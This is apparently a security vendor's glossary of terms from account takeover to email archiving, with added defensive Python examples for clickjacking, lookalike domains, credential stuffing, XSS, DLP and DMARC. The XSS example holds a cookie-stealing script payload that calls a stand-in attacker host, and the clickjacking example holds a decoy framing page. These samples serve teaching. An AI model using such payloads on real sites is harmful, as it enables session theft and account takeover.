Cybersecurity Glossary

To implement effective cybersecurity solutions built for the digital world, it’s important to understand common industry concepts and definitions. This glossary provides you with cybersecurity terms to be aware of as you look to protect your organization against cyber threats.

Account takeover (ATO)

Account takeover (ATO) is when an attacker gains control of one or more of a victim's online accounts, typically with credentials that were phished, guessed, or exposed in an earlier breach, and then uses the account for fraud, data theft, or further attacks on the victim's contacts.

Advanced persistent threat (APT)

An advanced persistent threat, or APT, is a cyberattack in which one or more well-resourced threat actors gain unauthorized access to a network and keep that access for an extended period without being detected. Typical targets are large enterprises and government organizations, whose sprawling environments make a quiet, low-volume intrusion easy to miss. Once inside, the attackers expand their foothold over time, moving laterally and escalating privileges. Consequences of a successful APT include loss of sensitive information, intellectual property theft, widespread malware infection, and complete takeover of systems or sites.

Barrel phishing

Also referred to as “double-barreled” phishing, barrel phishing is a more sophisticated form of phishing that involves two emails. The first email—often referred to as the “bait email”—attempts to establish a relationship with the recipient or trick them into believing the sender is a trusted source. Once the recipient’s guard is lowered, they’re sent a follow-up email where the actual phishing occurs, usually in the form of malicious links.

Botnet

A botnet, short for "robot network," is a network of compromised, Internet-connected devices. The infected devices are controlled remotely by a threat actor to carry out malicious activities, such as launching distributed denial-of-service (DDoS) attacks, sending spam and phishing campaigns, carrying out brute force and credential stuffing attacks, and more. Botnets continue to grow with the spread of poorly secured IoT devices, which give cybercriminals a large pool of machines to recruit. Emotet, the infamous malware, operated as a botnet.

Brand impersonation

Brand impersonation is a type of email phishing attack where cybercriminals pose as a trusted brand to dupe victims and steal their data. Also known as brand spoofing, this cyberattack uses an email that looks like it’s from a recognizable brand to trick recipients into clicking a link or downloading an attachment containing malware. Some of the most impersonated brands include Facebook, Microsoft, Google, and PayPal.

Browser exploit

A browser exploit refers to malicious code that is executed without a user’s knowledge to gain access to a computer system. It often targets vulnerabilities within web browsers or plugins.

Browser isolation

Browser isolation is a security control that isolates web activity from other applications and processes running on the same device. This helps limit the potential damage caused by malicious websites and drive-by downloads.

Browser security

Browser security refers to measures taken to secure web browsers from attack or intrusion by cybercriminals, including phishing, spear-phishing, and malware attacks. It includes installing anti-malware software as well as configuring browser settings such as disabling plug-ins, enabling pop-up blockers, etc.

Brute force

Brute force refers to an attack that tries to gain unauthorized access to an account, or to recover an encryption key, by systematically guessing. Attackers try password combinations (or, against weak keys, every possible key) until one works; dictionary and hybrid attacks narrow the search to likely candidates. A successful guess gives the attacker a valid login, which can then be used for harvesting data, spreading malware and ransomware, diverting website traffic, and more. While brute force attacks have existed for many years, automated tooling and cheap computing power have made them faster and easier to run at scale. Effective protections are rate limiting and account lockout on login endpoints, multi-factor authentication, long unique passwords (and sufficiently long keys), monitoring for bursts of failed logins, and user awareness training.

Business Email Compromise (BEC)

Business Email Compromise (BEC) is a type of spear phishing attack in which an attacker impersonates a trusted contact of an employee, such as an executive, vendor, or partner, to have them transfer funds, reveal sensitive information, or carry out other harmful actions. BEC messages often carry no malicious attachment or link at all, relying on social engineering alone, which is why signature-based filters frequently miss them.

CEO fraud

CEO fraud is when a hacker impersonates a senior executive within an organization and attempts to dupe employees into providing sensitive company information, sharing account credentials, or transferring funds.

Click-jacking

Click-jacking (clickjacking) is a cyberattack in which an attacker's page loads a legitimate site in an invisible or disguised frame and positions it so that a user who believes they are clicking a harmless button actually clicks a control on the framed site, triggering an unintended action such as changing a setting, approving a transaction, or granting a permission. Clickjacking can lead users to unknowingly download malware, divulge account credentials, and more. Sites defend against it by refusing to be framed, using the Content-Security-Policy frame-ancestors directive or the older X-Frame-Options header.
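
The check below is an added example, not code from this glossary or its publisher. It shows what the attacker's page looks like and how to tell from a site's response headers whether it can be framed; the header names and directive semantics are the real ones, while the response dicts and the decoy page are constructed for the example.

```python
"""Framing-protection check for HTTP responses.

Assumes a response is represented as a plain dict of header name -> value.
CSP frame-ancestors is preferred and overrides X-Frame-Options in browsers
that support it; X-Frame-Options is kept for older clients.
"""

# What the attacker page looks like: the victim site is loaded in an invisible
# iframe placed over a decoy button. (Constructed illustration.)
ATTACKER_PAGE = """
<button style="position:absolute;top:100px;left:100px">Claim your prize</button>
<iframe src="https://victim.example/settings/disable-mfa"
        style="position:absolute;top:0;left:0;opacity:0;width:600px;height:400px">
</iframe>
"""

# Headers a hardened site should send on every HTML response.
HARDENED_HEADERS = {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
}


def parse_csp(value):
    """Split a Content-Security-Policy value into {directive: [tokens]}."""
    policy = {}
    for part in value.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = [t.strip("'\"").lower() for t in tokens[1:]]
    return policy


def framing_protection(headers):
    """Classify a response as 'deny', 'sameorigin', 'allowlist' or 'none'.

    An allowlist still blocks framing by arbitrary sites, but every listed
    origin must be trusted not to be hijacked.
    """
    lower = {name.lower(): value for name, value in headers.items()}

    csp = lower.get("content-security-policy")
    if csp:
        ancestors = parse_csp(csp).get("frame-ancestors")
        if ancestors is not None:
            if ancestors == ["none"]:
                return "deny"
            if ancestors == ["self"]:
                return "sameorigin"
            return "allowlist"

    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "sameorigin"
    # ALLOW-FROM is obsolete and ignored by current browsers, so it is no protection.
    return "none"


def is_clickjackable(headers):
    """True when nothing in the headers stops the page from being framed."""
    return framing_protection(headers) == "none"


if __name__ == "__main__":
    for label, hdrs in [("unprotected", {"Content-Type": "text/html"}),
                        ("hardened", HARDENED_HEADERS)]:
        print(label, framing_protection(hdrs), "clickjackable" if is_clickjackable(hdrs) else "safe")
```

Run it against the headers of a real response (from a proxy or `curl -I`) to see which of the two mechanisms a site relies on; a site that only sends `X-Frame-Options: ALLOW-FROM` is unprotected in current browsers.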

Clone phishing

Clone phishing uses a duplicate or “clone” copy of an email from a trusted source to deceive the recipient. Instead of creating their own email, the hacker duplicates an existing email from a well-established brand to lure their victims. The email is typically either one the recipient has received in the past or at least isn’t surprised to be receiving. The legitimacy of the cloned email tricks recipients into clicking on malicious links or giving up sensitive information.

Cloud access security broker (CASB)

A cloud access security broker, or CASB, is a policy enforcement point that sits between an organization's users and the cloud services and applications they use. It gives security teams visibility into which cloud apps are in use and applies controls such as authentication, data loss prevention, encryption, and threat detection to the data being accessed and stored there. CASBs can be deployed on-premises or as a cloud service and extend a company's security policy beyond its own infrastructure to cloud-based applications.

Cloud email

Cloud email, such as Gmail, is email hosted by a cloud-based email service provider rather than on an organization's own mail servers. Its major benefit is that users can reach their mailbox from anywhere with an Internet connection, with no VPN or on-premises server required. The same property is what makes cloud mailboxes attractive to attackers holding stolen credentials, so multi-factor authentication and login monitoring matter more, not less.

Cloud email security supplement (CESS)

Cloud email security supplements, or CESSs, provide additional security measures specific to phishing-related attacks. They are typically utilized in particular use cases where organizations are regularly facing specific yet sophisticated threats that are hard to detect. CESSs are beneficial for organizations that need real-time scanning of inboxes or require enhanced detection and remediation methods for email-related cyberattacks. With the right CESSs in place, organizations can benefit from an additional layer of security that specifically addresses threats that are prevalent to their business.

Cloud security

Cloud security, also referred to as cloud computing security, is the discipline of protecting cloud-based systems, including their data, infrastructure, and applications, from cyberthreats. It encompasses a collection of technology solutions, processes, and controls applied by cloud service providers and by their customers, each responsible for their own part of the stack under the shared responsibility model: the provider secures the underlying platform, while the customer remains responsible for identities, configuration, and data. With the growing popularity of cloud services and applications, cloud security, particularly for enterprises, has increased in importance.

Computer vision

Computer Vision is a field of computer science that uses Artificial Intelligence (AI) to understand visual data (imagery). If AI is used to “think” by analyzing and interpreting data inputs, Computer Vision is used to “see” by analyzing and interpreting visual inputs.

Content disarm and reconstruction (CDR)

Content disarm and reconstruction (CDR) is a file-sanitization technique that processes incoming files, whether email attachments or web downloads, before they reach the endpoint device. Rather than trying to detect malware, CDR strips out potentially active or malicious elements such as macros, embedded scripts, and embedded objects, then rebuilds a clean copy of the file that preserves its usable content and layout.

Cousin domain

A cousin domain, also referred to as a lookalike domain, is a domain registered to resemble the name of a legitimate website. Cousin domains use common typos (www.facabook.com), look-alike characters (goog1e.com, where the digit 1 stands in for the letter l), or the brand name combined with extra words, in an effort to trick fast-moving Internet users into thinking they're on a legitimate website. Once users land on the cousin domain, they are presented with a phishing page, typically a cloned login form, that harvests their credentials.

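The classifier below is an added example, not code from this glossary or its publisher. It folds a domain label to the letters a reader would perceive (digits, symbols, Cyrillic look-alikes, and pairs like "rn" for "m"), then compares it to a list of protected brands by edit distance and substring. The brand list, the legitimate-domain set, and the confusable table are constructed for the example; the registrable label is taken as the second-to-last label, which is wrong for suffixes like co.uk, so production code should use the Public Suffix List.

```python
"""Lookalike-domain classifier."""
import unicodedata

BRANDS = ["facebook", "google", "paypal", "microsoft"]          # constructed
LEGITIMATE = {"facebook.com", "google.com", "paypal.com", "microsoft.com"}

# Single characters attackers substitute for letters: digits, symbols and Cyrillic look-alikes.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
})
# Character pairs that render like a single letter in many fonts.
PAIRS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalize(label):
    """Fold a domain label to the letters a reader would perceive."""
    label = unicodedata.normalize("NFKD", label.lower())
    label = "".join(c for c in label if not unicodedata.combining(c))  # drop accents
    label = label.translate(CONFUSABLES)
    for pair, letter in PAIRS:
        label = label.replace(pair, letter)
    return label


def levenshtein(a, b):
    """Edit distance: one insertion, deletion or substitution per unit."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain):
    # Assumption: the brand-bearing label is the second-to-last one.
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_legitimate(domain):
    domain = domain.lower().rstrip(".")
    return any(domain == d or domain.endswith("." + d) for d in LEGITIMATE)


def classify(domain, brands=BRANDS):
    """Return (kind, brand): legitimate, homoglyph, tld_swap, typo, combo or unrelated."""
    if is_legitimate(domain):
        return ("legitimate", registrable_label(domain))
    label = registrable_label(domain)
    folded = normalize(label)
    for brand in brands:
        if folded == brand:
            # Same letters once look-alikes are folded: goog1e, micr\u043esoft (Cyrillic o),
            # or the real name on a different TLD.
            return ("homoglyph" if label != brand else "tld_swap", brand)
        if levenshtein(folded, brand) <= (1 if len(brand) < 6 else 2):
            return ("typo", brand)             # facabook, gogle
        if brand in folded:
            return ("combo", brand)            # brand plus extra words, e.g. paypal-account-verify
    return ("unrelated", None)


if __name__ == "__main__":
    for d in ["www.facabook.com", "goog1e.com", "paypal-account-verify.net", "www.google.com"]:
        print(d, classify(d))
```

Feed it newly registered domains from a certificate-transparency or zone-file feed to catch lookalikes before they are used. It checks only the registrable label, so a subdomain abuse such as a brand name placed in front of an unrelated domain needs a separate check of every label.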
Credential harvesting

Credential harvesting is a type of cyberattack that targets login credentials such as usernames and passwords. Common tactics include phishing emails, cloned login pages on lookalike domains, and malicious browser extensions or keyloggers. Once the credentials are obtained, cybercriminals use them to gain access to accounts and sensitive information, or sell them on, leaving organizations exposed to account takeover and fraud.

Credential stuffing

Credential stuffing is a cyberattack that takes username and password pairs exposed in one breach and replays them, at scale and with automated tooling, against unrelated services and applications. It works because people reuse passwords across sites. For example, if there is a data breach at a major retail chain, hackers may use the credentials obtained in the breach for attempted logins at a financial services application. Unlike brute force, each account is usually tried only once or twice with a known password, so lockout thresholds alone don't catch it; multi-factor authentication, checks against breached-password lists, and detection of high-volume, low-success login traffic from a single source do.

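The detector below is an added example, not code from this glossary or its publisher, and it serves both the brute force and the credential stuffing entries: both attacks show up as bursts of failed logins from one source, but they differ in shape. The log format and the sample lines are constructed for the example and are not from any real system.

```python
"""Distinguish brute force from credential stuffing in authentication logs.

Brute force hammers one account with many guesses; credential stuffing tries
many accounts with one or two known passwords each. Accounts that log in
successfully from a flagged source should be treated as taken over.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(r"ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)")

# Constructed sample: one stuffing source, one brute-force source, one ordinary user.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z ip=203.0.113.5 user=alice result=fail
2024-05-01T10:00:02Z ip=203.0.113.5 user=bob result=fail
2024-05-01T10:00:02Z ip=203.0.113.5 user=carol result=fail
2024-05-01T10:00:03Z ip=203.0.113.5 user=dave result=fail
2024-05-01T10:00:03Z ip=203.0.113.5 user=erin result=fail
2024-05-01T10:00:04Z ip=203.0.113.5 user=frank result=ok
2024-05-01T10:01:00Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:01:01Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:01:02Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:01:03Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:01:04Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:01:05Z ip=198.51.100.9 user=admin result=fail
2024-05-01T10:02:00Z ip=192.0.2.77 user=alice result=fail
2024-05-01T10:02:05Z ip=192.0.2.77 user=alice result=ok
"""


def parse(log_text):
    """Return a list of {ip, user, result} dicts, skipping lines that don't match."""
    return [m.groupdict() for m in map(LOG_RE.search, log_text.splitlines()) if m]


def classify_sources(events, min_attempts=5, min_fail_ratio=0.8):
    """Label each source IP as normal, brute_force, credential_stuffing or suspicious."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    verdicts = {}
    for ip, evs in by_ip.items():
        attempts = len(evs)
        failures = sum(e["result"] == "fail" for e in evs)
        accounts = {e["user"] for e in evs}
        if attempts < min_attempts or failures / attempts < min_fail_ratio:
            verdicts[ip] = "normal"
        elif len(accounts) / attempts >= 0.8:
            verdicts[ip] = "credential_stuffing"   # nearly every attempt targets a different account
        elif len(accounts) <= 2:
            verdicts[ip] = "brute_force"           # many guesses against one or two accounts
        else:
            verdicts[ip] = "suspicious"
    return verdicts


def compromised_accounts(events, verdicts):
    """Accounts that logged in successfully from a flagged source."""
    flagged = {ip for ip, v in verdicts.items() if v != "normal"}
    return {e["user"] for e in events if e["ip"] in flagged and e["result"] == "ok"}


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    verdicts = classify_sources(events)
    print(verdicts)
    print("force password reset for:", compromised_accounts(events, verdicts))
```

Real attackers spread stuffing across many IPs, so the same logic is usually run per ASN or per user-agent as well as per IP; the thresholds here are starting points to tune against a baseline of your own login traffic.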
Cross-site scripting (XSS)

A cross-site scripting (XSS) attack is a technique in which attackers inject malicious script, most often JavaScript, into pages served by a legitimate website. The attacker abuses a vulnerability in the web application, typically user-supplied input that is placed into a page without proper encoding, so that the script runs in the victim's browser with the site's own origin. XSS attacks can be used to steal session cookies and credentials, deface pages, redirect users to phishing sites, deliver malware, and more. The defense is context-appropriate output encoding of untrusted data, backed by a Content Security Policy.
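
The snippet below is an added example, not code from this glossary or its publisher. It places a reflected-XSS-vulnerable page render next to its hardened form and shows why an attribute and a URL need their own treatment; the page template, the payload, and the hostnames are constructed.

```python
"""Reflected XSS: the vulnerable render beside its hardened form."""
import html

ALLOWED_SCHEMES = ("http://", "https://")

# Constructed attacker payload: exfiltrates the session cookie if it executes.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_results_vulnerable(query):
    """Reflects the search term into the page unchanged: any markup in it is executed."""
    return f"<p>Results for {query}</p>"


def render_results_safe(query):
    """HTML-encodes the term, so the browser shows the payload as text instead of running it."""
    return f"<p>Results for {html.escape(query)}</p>"


def safe_link(href, label):
    """Untrusted data in an attribute and in a URL need their own treatment.

    quote=True additionally encodes quotes, so the value cannot break out of the
    attribute; the scheme check blocks javascript: and data: URLs, which no
    amount of encoding makes safe inside href.
    """
    if not href.strip().lower().startswith(ALLOWED_SCHEMES):
        href = "#"
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(label)}</a>'


if __name__ == "__main__":
    print(render_results_vulnerable(PAYLOAD))   # script tag survives
    print(render_results_safe(PAYLOAD))         # &lt;script&gt; ... rendered as text
    print(safe_link("javascript:alert(document.cookie)", "Click me"))
```

Encoding is context-specific: the HTML-body encoder above is not sufficient for data placed inside a `<script>` block, a CSS value, or an unquoted attribute, and template engines that auto-escape only cover the contexts they know about.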

Cryptojacking

Cryptojacking is a cyberattack in which hackers run cryptocurrency-mining code on a victim's device, server, or browser without permission and secretly use its computing resources to mine for themselves. Mining demands significant computing power and electricity; the victim pays that cost while the attacker collects the coins. Although cryptojacking is designed to go unnoticed, it often degrades the infected device, causing it to run slowly, crash, or overheat, and in cloud environments it shows up as unexpected compute bills. Cryptojacking continues to rise with the growth of digital currencies, and schemes often begin with a phishing email or a compromised website.

CryptoLocker

CryptoLocker is a ransomware variant that targeted Windows computers and encrypted victims' files with public-key cryptography, so the files could not be recovered without the private key held by the attackers. As with other ransomware, once an infection took place the hackers demanded a ransom in exchange for the decryption key. CryptoLocker first arrived on the scene in 2013. It was delivered via phishing emails that duped victims into opening malicious attachments containing a Trojan downloader. Defenses against CryptoLocker and its successors include offline backups that the malware cannot reach, firewalls, anti-virus programs, anti-phishing solutions, anti-malware solutions, and user awareness training.

Cyberattack

A cyberattack is any attempt by nefarious individuals to target an organization’s IT infrastructure, networks, systems, or devices to either steal, expose, or destroy information or assets. When carried out successfully, cyberattacks impact your business in more ways than one. From increasing the likelihood of a future cyberattack to putting your organization in legal jeopardy, cyberattacks have the ability to inflict serious harm across your organization if left unchecked.

Some of the more common types of cyberattacks include denial-of-service (DoS), man-in-the-middle (MITM), business email compromise (BEC), phishing, spear phishing, ransomware, and DNS spoofing. In order to prevent cyberattacks, it’s important to educate your staff on cybersecurity best practices. Utilizing AI-based cybersecurity solutions can also enhance your security posture and make it easier to detect and neutralize threats before they cause damage.

Cybersecurity

Cybersecurity is the collection of technologies, best practices, and processes used to protect your IT infrastructure, systems, networks, and devices from harmful threats. It relies on employees to know how to detect and address cyberattacks, as well as sophisticated technologies that make it more difficult for individuals to infiltrate your IT infrastructure.

With a global workforce that has become increasingly remote, cybersecurity has been a pressing concern for many organizations. Effectively securing devices and networks that are outside an organization’s IT infrastructure is crucial in order to fortify your cybersecurity measures and keep your organization out of harm’s way.

Considering the average data breach costs organizations $3.8 million (USD) globally, the need for effective cybersecurity solutions has never been more important. As cyberattacks become increasingly sophisticated and harder to detect, organizations must lean on AI-based cybersecurity solutions to automate the prevention, detection, and remediation of cyberattacks in order to effectively curb threats before it’s too late.

Data Loss Prevention (DLP)

Data Loss Prevention (DLP) is the practice of protecting sensitive data from being lost, destroyed, or exfiltrated through unwanted and unauthorized means. DLP refers to a set of tools and processes that identify confidential and critical data (by pattern matching, fingerprinting, or classification labels) and then enforce policy on it through alerts, blocking, encryption, and continuous monitoring. DLP solutions oversee activity on networks, endpoints, email, and cloud applications. They're also used for reporting and compliance, as well as incident response.

Data exfiltration

Data exfiltration is the deliberate, unauthorized transfer of sensitive data out of an organization, whether by an external attacker or by an insider. It occurs after an initial compromise and is often the goal of phishing and other email-borne attacks: a phishing email gains the attacker a foothold in the organization's systems, or an insider emails sensitive data to outside addresses without approval. Ransomware operators commonly exfiltrate data before encrypting it so they can also threaten to publish it (double extortion). Defenses combine monitoring of outbound email and network traffic (data loss prevention), least-privilege access to sensitive data, and email security with advanced incident response capabilities, threat detection, user awareness training, and a continuous improvement cycle.

Data leakage

Data leakage is the unauthorized exfiltration or transfer of data from a computer system or network, typically via unsecured channels such as email, USB devices, or cloud storage. It can lead to data breaches and other security risks.
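
The scanner below is an added example, not code from this glossary or its publisher, and it illustrates both the DLP and the data leakage entries: it inspects an outbound message for payment card numbers and US Social Security numbers and applies a simple policy depending on whether the recipients are external. The internal domain list, message format, and sample messages are constructed. Card candidates are validated with the Luhn checksum so that order numbers and other long digit runs don't trigger the policy.

```python
"""Outbound email inspection for card numbers and SSNs."""
import re

INTERNAL_DOMAINS = {"example.com"}                      # constructed
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")        # 13-19 digits, optional separators
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_ok(digits):
    """Luhn checksum: every second digit from the right is doubled (minus 9 if > 9)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    """Digit runs that look like card numbers and pass Luhn."""
    cards = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            cards.append(digits)
    return cards


def find_ssns(text):
    return SSN_RE.findall(text)


def inspect_outbound(message):
    """Policy: sensitive data leaving the organization is blocked, sensitive data
    sent internally is allowed but alerted on, everything else is allowed."""
    text = message["subject"] + "\n" + message["body"]
    cards, ssns = find_card_numbers(text), find_ssns(text)
    external = [r for r in message["to"] if r.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS]
    if not cards and not ssns:
        verdict = "allow"
    elif external:
        verdict = "block"
    else:
        verdict = "alert"
    return {"verdict": verdict, "cards": cards, "ssns": ssns, "external_recipients": external}


# Constructed sample: a real-looking (test) card number, an SSN, and an order number that
# happens to be 16 digits long but fails the Luhn check.
LEAK = {
    "from": "alice@example.com",
    "to": ["contact@partner-mail.example"],
    "subject": "Customer details",
    "body": "Card 4111 1111 1111 1111 exp 12/26, SSN 123-45-6789. Order 1234567890123456 shipped.",
}

if __name__ == "__main__":
    print(inspect_outbound(LEAK))
```

Pattern matching alone produces noise; in practice the same engine is fed keyword context ("card", "SSN"), document fingerprints of known-sensitive files, and classification labels, and attachments are text-extracted before scanning.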

Data privacy

Data privacy refers to the ability for online users to control their personal information, including to what extent it gets shared with third parties. This personal information is tracked and stored by websites and online applications to carry out services, such as personalizing user experiences. Because this information could be exploited by cybercriminals and other third parties, laws such as General Data Protection Regulation (GDPR) and Health Insurance Portability and Accountability Act (HIPAA) govern data privacy. They regulate the kinds of personal information third parties can collect, ensure proper safeguards are implemented to protect personal information, and hold third parties accountable to rules and standards.

Denial-of-service (DoS) attack

A denial-of-service (DoS) attack makes a system, service, or network unavailable to its legitimate users, usually by flooding it with more traffic or requests than it can handle, or by triggering a crash. In the email context the classic form is the mail bomb: a flood of messages, often sent through botnets, that overwhelms a mailbox or mail server and blocks service for all users. DoS attacks don't typically result in compromised data, but they are simple to carry out, cause real disruption and cost for companies on the receiving end, and are sometimes used as a distraction while another attack takes place. Organizations reduce their exposure with rate limiting and filtering at the network and application edge, capacity planning, and upstream traffic-scrubbing services.

Display name spoofing

Display name spoofing uses the display name of an email sender to deceive recipients. By putting a real name the recipient knows in the display name while sending from an unrelated address, hackers attempt to trick users into divulging sensitive information or downloading attachments infected with malware. Display name spoofing is one of the most common forms of email spoofing and is especially effective on mobile devices, where email clients often show only the display name and hide the sender's actual address. Protection includes security awareness training and email security that checks the display name against the address the message actually comes from, flagging messages in which a known colleague's or executive's name appears on an external or unfamiliar address.

Distributed denial-of-service (DDoS) attack

A distributed denial-of-service (DDoS) attack is a supercharged version of a traditional denial-of-service (DoS) attack. It leverages many compromised computers, typically a botnet, to overwhelm a target at once, enabling attacks to be deployed faster and at far larger traffic volumes. Not only can this be more catastrophic for the targeted network, but because the traffic comes from thousands of locations it is far harder to filter by source and to trace back to the operator.

DomainKeys Identified Mail (DKIM)

DomainKeys Identified Mail (DKIM) is an email authentication method in which the sending mail server adds a digital signature to each message, computed over selected headers and the body with a private key. The receiving server fetches the matching public key from a DNS TXT record published by the signing domain (the d= tag in the signature) and verifies the signature. A valid signature proves that the message was authorized by that domain and was not altered in transit; the check happens automatically at the server level before the message ever reaches the recipient. DKIM does not by itself prove the message is safe, nor that the signing domain matches the visible From address; that alignment check is what DMARC adds.

Domain-based Message Authentication, Reporting and Conformance (DMARC)

Domain-based Message Authentication, Reporting and Conformance (DMARC) is an email authentication protocol that lets a domain owner tell receiving mail servers what to do with messages that claim to come from the domain but fail authentication. It protects the organization's own domain from being spoofed in spam and phishing sent to others.

Building on SPF and DKIM, the domain owner publishes a DMARC policy in a DNS TXT record at _dmarc.<domain>. A message passes DMARC when SPF or DKIM passes and the authenticated domain aligns with the visible From domain; otherwise the receiver applies the published policy (p=none to monitor only, p=quarantine, or p=reject) and sends aggregate reports to the address in the rua tag, which is how the domain owner learns who is sending mail in its name.

DNS spoofing

DNS spoofing, short for Domain Name System spoofing, is a cyberattack in which forged DNS data sends users to a harmful site in place of the one they asked for. In DNS cache poisoning, the attacker slips a forged response into a recursive resolver's cache, so every client of that resolver is redirected until the entry expires. Unprotected public Wi-Fi is a common venue: an attacker on the same network can answer DNS queries directly or hand out a rogue DNS server address over DHCP. Because DNS spoofing can be carried out at several points, including a man-in-the-middle position on the local network or compromise of a DNS server, it is hard to detect from the victim's side; DNSSEC validation and encrypted DNS (DNS over HTTPS or TLS) to a trusted resolver reduce the risk.

Document object model (DOM) reconstruction

Document object model (DOM) reconstruction is a form of remote browser isolation (RBI) that attempts to remove malicious content from webpage elements such as HTML, CSS, and scripts. Once the content is stripped, the solution reconstructs the page elements and delivers them to the user's local endpoint, which renders the rebuilt page itself. DOM reconstruction is an alternative to the pixel pushing and network vector rendering (NVR) methods of RBI. While it solves the latency problems of those methods, DOM reconstruction presents security and usability risks: the sanitizer must correctly identify every dangerous construct, and stripping active content can break legitimate pages.

Domain spoofing

Domain spoofing is a phishing attack in which cybercriminals put a legitimate domain's exact email address in the From header of a message they send. Unlike display name or cousin domain spoofing, there is no lookalike involved; the address is the real one. This form of email spoofing is less common for domains that enforce authentication: SPF and DKIM let receivers verify which servers and signing keys are authorized for a domain, and a DMARC policy of quarantine or reject tells them to isolate or discard mail that fails those checks. Without DMARC, SPF and DKIM results are only advisory, and an exact-domain spoof can still land in the inbox.

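The evaluation below is an added example, not code from this glossary or its publisher, and it serves both the DMARC entry and the domain spoofing entry above: it performs the check a receiving mail server does once SPF and DKIM results are in, and shows why an exact-domain spoof is rejected only when the domain publishes an enforcing policy. The records and hostnames are constructed; the tag names (v, p, sp, adkim, aspf, rua) are the real DMARC ones. The organizational domain is approximated as the last two labels (production code uses the Public Suffix List), and the pct tag is treated as 100.

```python
"""DMARC evaluation as a receiving mail server performs it."""

# Constructed policy record for example.com, as published at _dmarc.example.com.
EXAMPLE_RECORD = "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.com"


def parse_dmarc(record):
    """Turn 'v=DMARC1; p=reject; ...' into a dict of tag -> value."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def org_domain(domain):
    # Assumption: organizational domain = last two labels (wrong for co.uk-style suffixes).
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain, auth_domain, mode):
    """Relaxed ('r') alignment accepts any subdomain of the same organizational
    domain; strict ('s') requires an exact match."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_disposition(from_domain, record, spf_result, spf_domain, dkim_result, dkim_domain):
    """Return 'pass', or the policy to apply ('none', 'quarantine', 'reject').

    from_domain is the domain in the visible From: header. spf_domain is the
    envelope sender (MAIL FROM) domain SPF was checked against; dkim_domain is
    the d= tag of a DKIM signature that verified. Either mechanism passing
    *and* aligning with the From domain is enough.
    """
    tags = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(from_domain, spf_domain, tags.get("aspf", "r"))
    dkim_ok = dkim_result == "pass" and aligned(from_domain, dkim_domain, tags.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass"
    # The subdomain policy applies when the From domain is a subdomain of the
    # organizational domain that published the record (assumed here).
    if from_domain.lower() != org_domain(from_domain) and "sp" in tags:
        return tags["sp"]
    return tags.get("p", "none")


if __name__ == "__main__":
    # A spoof: From example.com, but sent from the attacker's own infrastructure.
    # SPF passes for the attacker's envelope domain, yet it does not align with From.
    print(dmarc_disposition("example.com", EXAMPLE_RECORD, "pass", "attacker.example", "fail", None))
    # Legitimate mail signed with the domain's own key.
    print(dmarc_disposition("example.com", EXAMPLE_RECORD, "fail", "bounce.example.com", "pass", "example.com"))
```

Note the second scenario in the main block: SPF can fail (for instance after forwarding breaks the envelope) and the message still passes because the DKIM signature survives and aligns, which is why both mechanisms should be deployed before moving from p=none to p=reject.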
Drive-by download

A drive-by download is the delivery of malicious software to a user's computer without their knowledge or consent, typically when they merely visit a compromised or malicious website or view an infected advertisement; an exploit for a browser or plugin vulnerability does the rest, with no click required. The downloaded malware can be used to steal data, hijack the user's computer, or take control of their system. It can also be used to install other types of malware, such as ransomware or spyware.

Endpoint detection and response (EDR)

EDR, or endpoint detection and response, is technology used for endpoint protection. EDR systems detect security threats by monitoring endpoint activity for suspicious behaviors, block and contain malicious threats, and facilitate incident response and investigation activities. Organizations often use EDR systems as part of a multi-faceted approach to cybersecurity, pairing the technology with other systems such as XDR (Extended Detection and Response), SIEM (Security Information and Event Management), and AI threat detection and response solutions.

Email archiving

Email archiving is the process of preserving and storing email communications in a manner that is safe, organized, and accessible for future use. Organizations depend on email archiving for a variety of reasons, including compliance with laws, internal audits, potential litigation, and more. Safe and effective email archiving requires email security to protect sensitive email communications against cyberthreats and bad actors.

Email filtering

